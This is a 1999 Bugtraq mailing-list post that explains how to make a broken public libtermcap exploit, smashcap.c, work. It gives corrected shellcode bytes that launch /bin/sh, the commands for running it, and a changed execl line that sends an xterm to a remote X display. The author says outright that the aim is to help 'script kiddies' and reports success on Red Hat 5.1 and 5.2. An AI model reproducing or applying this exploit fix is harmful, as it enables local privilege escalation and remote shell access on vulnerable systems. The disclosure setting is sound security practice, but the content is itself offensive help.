libtermcap exploit fix ... smashcap.c
Date: Mon, 23 Aug 1999 01:18:16 +0300
From: Hudin Lucian <luci@WILD.TRANSART.RO>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: libtermcap exploit fix ... smashcap.c
Hi, since bugtraq it's a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
To make the smashcap.c work , all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be :
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of :
"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"
also, you'll have to be on console running x to exploit it, but
if you have another box where you can start x then it's ok
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line from the smashcap.c into
execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);
well, it works on most redhats (tested on 5.1 and 5.2)
on slakware it sigsegv's , you need to work a little bit, sorry I don't
have a slakware box to work on .
regards, lucysoft
